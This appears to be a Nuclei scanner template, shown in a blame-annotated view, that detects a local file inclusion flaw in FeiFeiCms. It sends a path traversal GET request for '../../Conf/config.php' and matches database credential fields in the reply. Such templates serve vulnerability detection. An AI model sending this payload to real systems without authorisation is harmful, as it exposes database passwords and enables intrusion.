2021-04-07 14:24:35 +00:00
|
|
|
id: feifeicms-lfr
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-04-07 14:24:35 +00:00
|
|
|
info:
|
2022-07-27 20:17:31 +00:00
|
|
|
name: FeiFeiCms - Local File Inclusion
|
2021-04-07 14:24:35 +00:00
|
|
|
author: princechaddha
|
|
|
|
severity: high
|
2022-07-27 20:17:31 +00:00
|
|
|
description: FeiFeiCms is vulnerable to local file inclusion.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-04-26 06:03:24 +00:00
|
|
|
- https://www.cnblogs.com/jinqi520/p/10202615.html
|
|
|
|
- https://gitee.com/daicuo/feifeicms
|
2022-07-27 20:17:31 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: feifeicms,lfi
|
2021-04-07 14:24:35 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-04-07 14:24:35 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/index.php?s=Admin-Data-down&id=../../Conf/config.php"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<?php"
|
|
|
|
- "db_name"
|
|
|
|
- "db_pwd"
|
|
|
|
- "db_host"
|
|
|
|
condition: and
|
|
|
|
part: body
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a0046304402206af33af50fd408d4a4141eb191ffaaeb26815aa04b62d7a9c85e3dab8109a31b022024ed4722ffb28f9bbe31272374362c9b6068076eefbdae8d16caa1e1f8529415:922c64590222798bb761d5b6d8e72950
|